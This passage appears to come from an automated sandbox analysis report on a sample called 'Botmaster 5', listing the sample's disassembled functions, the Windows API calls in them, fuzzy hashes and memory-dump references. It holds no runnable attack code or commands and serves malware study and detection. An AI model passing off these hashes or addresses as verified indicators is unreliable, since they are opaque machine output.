                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: LongWindow$MessagePropSend
                                                                                                                                                                                                                  • String ID: PB_ID
                                                                                                                                                                                                                  • API String ID: 499798845-4173770792
                                                                                                                                                                                                                  • Opcode ID: 86af0f68bb1aa0a42af094b8af81ce54ed9b68d6ec62858d0118a3a926f96289
                                                                                                                                                                                                                  • Instruction ID: ed85781749b5b246fed9c57d5b64a34d3fc5b906890d8a5f8816de75811ddbb0
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86af0f68bb1aa0a42af094b8af81ce54ed9b68d6ec62858d0118a3a926f96289
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13019271600315BFCF109F59DC84E4ABBB8FB44761F10862AF96557290D3B4E940CF94
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00412C18 Relevance: 8.0, APIs: 5, Instructions: 465COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • MakeSureDirectoryPathExists.IMAGEHLP(?,00000000,00000000,?,?,00000000,00000000,00000008,?,?,?,?,?,00000001,?,?), ref: 00412D47
                                                                                                                                                                                                                  • OemToCharW.USER32(?,?), ref: 00412DC9
                                                                                                                                                                                                                  • MakeSureDirectoryPathExists.IMAGEHLP(?,00000000,00000000,?,?,00000000,00000000,00000008,00000001,?,00000000,00000000,00000000,00000000,00469100,00000001), ref: 00413002
                                                                                                                                                                                                                    • Part of subcall function 0041C720: RtlAllocateHeap.NTDLL(022D0000,00000008,00000000,00409AA5,00000001,?,00000000,00000000,00000007,0040341A,00000057,00000000,00000000,00000000,00000000,00000000), ref: 0041C731
                                                                                                                                                                                                                    • Part of subcall function 0041C6C0: memcpy.MSVCRT ref: 0041C6FA
                                                                                                                                                                                                                    • Part of subcall function 004299B0: RtlAllocateHeap.NTDLL(00990000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299D6
                                                                                                                                                                                                                    • Part of subcall function 0041C5B0: HeapFree.KERNEL32(022D0000,00000000,00000000,00403478,0046B16C,00000000,00000057,00000000,00000000,00000000,00000000,00000057,00000000,00000000,00000000,00000000), ref: 0041C5BE
                                                                                                                                                                                                                  • MakeSureDirectoryPathExists.IMAGEHLP(?,00000000,00000000,?,?,00000000,00000000,00000008,00000001,?,00000000,00000000,00000000,00000000,00469100,00000001), ref: 00413162
                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,00000000,00000000,?,00019000,FFFFFFFF,00019000), ref: 00413324
                                                                                                                                                                                                                    • Part of subcall function 004299B0: HeapReAlloc.KERNEL32(00990000,00000000,00000000,?,?,?,00407074,?,0000004E,00000000,00000000,?,00000000), ref: 004299F9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$DirectoryExistsMakePathSure$Allocate$AllocAttributesCharFileFreememcpy
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 4055739490-0
                                                                                                                                                                                                                  • Opcode ID: 43f06104c22bfa8c2f70adc399a3545c9dfabf87c9aebba4af76278d60f26f39
                                                                                                                                                                                                                  • Instruction ID: 75b02a04a12e442dd39238cc83b8e077f0a1e21f2bf5aeab1ef63a012de2d1b9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43f06104c22bfa8c2f70adc399a3545c9dfabf87c9aebba4af76278d60f26f39
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92022FB1104341AFD721AF61DC81B9F7BA9FF44304F10882EF29486261DBB99CD5DB9A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00412980 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 197COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: 1.2.3
                                                                                                                                                                                                                  • API String ID: 0-2310465506
                                                                                                                                                                                                                  • Opcode ID: 876017cd097b5646cc5e0c34f3aca1dc7bc126e5a52e7cccc05c3f7887764a43
                                                                                                                                                                                                                  • Instruction ID: 305858f776bc7fa35b417e5f98dd1da6d4fbd1beb282b069888b85c7fc5d999f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 876017cd097b5646cc5e0c34f3aca1dc7bc126e5a52e7cccc05c3f7887764a43
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4971E0B16002048FCB24DF19C980ADAB7E5FF88354F14416BED09CB316D7BAD995CBA9
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041BC80 Relevance: 7.6, APIs: 5, Instructions: 121COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0041BCCC
                                                                                                                                                                                                                    • Part of subcall function 0041B3F0: WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0041B671,00000000,009A1000,00000000,?,?,?,00401271,00000000), ref: 0041B415
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: FileWritememcpy
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 4212128793-0
                                                                                                                                                                                                                  • Opcode ID: bed5f574da9b411f61243ae6ea2d27c6ea686fa3d9d4985646c9fed880fc8b0d
                                                                                                                                                                                                                  • Instruction ID: 91465c89130404a3d15a00f02696711ef5640c3081ebc236cde9ed03d80550fd
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bed5f574da9b411f61243ae6ea2d27c6ea686fa3d9d4985646c9fed880fc8b0d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08416F762007008FC324DF6AD888E5BB7E9EFD4725F04882EF59687710D775A848CBA5
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041B4C0 Relevance: 7.6, APIs: 5, Instructions: 112filememoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,009A1000,0043A840,?,?,?,?,00000000,0041B633,00000000), ref: 0041B4F3
                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,009A1000,0043A840,?,?,?,?,00000000,0041B633,00000000), ref: 0041B515
                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(009A0000,00000000,00001000,009A1000,0043A840,?,?,?,?,00000000,0041B633,00000000,00401259,00000000,00000000,00000000), ref: 0041B57D
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateFile$AllocateHeap
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2813278966-0
                                                                                                                                                                                                                  • Opcode ID: 8aa8c90ffbdfe143bbb6f39c7800b623081a2f4f5530b70454572da1cea728b2
                                                                                                                                                                                                                  • Instruction ID: 90b75b041ba6963f889926e4fda0b06d8734c26dde0d3fcb26683a573a9fc820
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aa8c90ffbdfe143bbb6f39c7800b623081a2f4f5530b70454572da1cea728b2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5331D1727413117BE2309B68AC85FA6B399E744778F20462AF661A72D0D7B4AC8087DD
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040E1CD Relevance: 7.6, APIs: 5, Instructions: 59synchronizationthreadCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00001000,?,?,00000000,?), ref: 0040E1E4
                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0046BF18,0045DF26,00000007,?,00404570,00000000,00000000,00000035,00000000,0000004C,00000001,00000035,00000001,0000002D,00000001,0000002B), ref: 0040E1FA
                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000008,00000000,?,?,00404570,00000000,00000000,00000035,00000000,0000004C,00000001,00000035,00000001,0000002D,00000001,0000002B), ref: 0040E217
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000008,?,?,00404570,00000000,00000000,00000035,00000000,0000004C,00000001,00000035,00000001,0000002D,00000001,0000002B,00000001), ref: 0040E223
                                                                                                                                                                                                                    • Part of subcall function 00428590: HeapFree.KERNEL32(00000000,-00000008,00427F46,-00000010,00000000,004276C2,00000000,?,00000000,IsThemeActive,FFFFFFFF,UxTheme.dll,00000000,00000000,0041CB18,00000008), ref: 004285C9
                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0046BF18,?,00404570,00000000,00000000,00000035,00000000,0000004C,00000001,00000035,00000001,0000002D,00000001,0000002B,00000001,0000001B), ref: 0040E25D
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3708593966-0
                                                                                                                                                                                                                  • Opcode ID: cc210eadc01e40f38193409489535def29ffe849ee3f6c717ac269954fe114b1
                                                                                                                                                                                                                  • Instruction ID: d0d143a94830e8b8cacaea77c711ab9eb9f5d772bf0824b423a1605002441151
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc210eadc01e40f38193409489535def29ffe849ee3f6c717ac269954fe114b1
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B119432204320ABC7248F56EC04A5777ECEF48710B00486EF941B7261EBB56C50CFAE
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00420CF6 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,00000000), ref: 00420D08
                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00420D1B
                                                                                                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 00420D29
                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000014,?,?), ref: 00420D3E
                                                                                                                                                                                                                  • CallWindowProcW.USER32(00424F1B,?,00000014,?,?), ref: 00420D57
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$ProcRect$CallClientFillLong
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1969025442-0
                                                                                                                                                                                                                  • Opcode ID: e68e452bd928d6e30f7ec9b8466f423f8f73dacea6ec08c37503e18ab2769d6e
                                                                                                                                                                                                                  • Instruction ID: a1344acf2480602af988eaec4aceb8fa2b00e2ae2f52571c8fa98b22bfe690ef
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e68e452bd928d6e30f7ec9b8466f423f8f73dacea6ec08c37503e18ab2769d6e
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B01F632501129FBCF129F94EC04EEE3B69FB09790F404421FE16A5061D7B5E920EBAA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00422205 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00422231
                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,msctls_progress32,00000000,?,?,?,?,?,00000000,00000000,00000000,-FFFFFEC7), ref: 004222B8
                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000406,?,?), ref: 004222D0
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateMessageSendWindowmemset
                                                                                                                                                                                                                  • String ID: msctls_progress32
                                                                                                                                                                                                                  • API String ID: 2250917740-3107856198
                                                                                                                                                                                                                  • Opcode ID: 9a8431e7cbe9fbfd2ae267590e24813c59eb1550b8e736c8b06ac3d80b951513
                                                                                                                                                                                                                  • Instruction ID: 8058ce802a90515a70da91959561f8ec5665e01b09c063a425148d5fc1abf698
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a8431e7cbe9fbfd2ae267590e24813c59eb1550b8e736c8b06ac3d80b951513
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A621A171200214FFCB018F51ED44D5A3FA9FB45358F00413AF60496170EBFA8960DBAE
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040F4B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 00429C80: RtlReAllocateHeap.NTDLL(00990000,00000000,009905D0,000041FE,00000000,00000000), ref: 00429CCA
                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401170,00000000,00000000,00000000,00000000,00000004,00000006,00000008,0043A820), ref: 0040F4CC
                                                                                                                                                                                                                  • wcscmp.MSVCRT ref: 0040F4DA
                                                                                                                                                                                                                  • memmove.MSVCRT ref: 0040F4EF
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AllocateFileHeapModuleNamememmovewcscmp
                                                                                                                                                                                                                  • String ID: \\?\
                                                                                                                                                                                                                  • API String ID: 2856431501-4282027825
                                                                                                                                                                                                                  • Opcode ID: ef25291fdddb9a739f85240246cea818c56750ad02a28f084d231048c6e56d88
                                                                                                                                                                                                                  • Instruction ID: 1220a6776a010df372dedd0a0a8c69d3ac48da2a766cc7967e234599669c9bf9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef25291fdddb9a739f85240246cea818c56750ad02a28f084d231048c6e56d88
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EF0A7F32007117AE310AB76ED89CAB7BDCEB98325F10153BFA45D1111EB7CA914D269
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041BDB0 Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SetFilePointer.KERNELBASE(?,?,00000000,00000001,?,?,?,0041B7F1,00000000,?,00000001,009A1000,?,?,00401380,00000001), ref: 0041BDD2
                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0041BE10
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: FilePointermemcpy
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1104741977-0
                                                                                                                                                                                                                  • Opcode ID: 26051e82c3b6df734a6b626d0746f9528e3ce638dca536de8c3d9e360b85c415
                                                                                                                                                                                                                  • Instruction ID: f2a721989ae25b6e351a0e0456c7cf67a2aa4ff1948dec00ceed82910f5d22ae
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26051e82c3b6df734a6b626d0746f9528e3ce638dca536de8c3d9e360b85c415
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 843119763006019FC224DF2AD858EABF7E9EFD4721F14C91EE69687B50C774A844CBA1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004048D2 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateMutexW.KERNEL32(00000000,00000001,?,00000000,00000000,?,00401117,004393BA,00000004,00000000,0043A820,00000008,0000001C,00000000,0043A840,00000007), ref: 004048F0
                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000001,?,00000000,00000000,?,00401117,004393BA,00000004,00000000,0043A820,00000008,0000001C,00000000,0043A840,00000007), ref: 004048FA
                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(00000000,00000001,?,00000000,00000000,?,00401117,004393BA,00000004,00000000,0043A820,00000008,0000001C,00000000,0043A840,00000007), ref: 0040492A
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000001,?,00000000,00000000,?,00401117,004393BA,00000004,00000000,0043A820,00000008,0000001C,00000000,0043A840,00000007), ref: 00404935
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
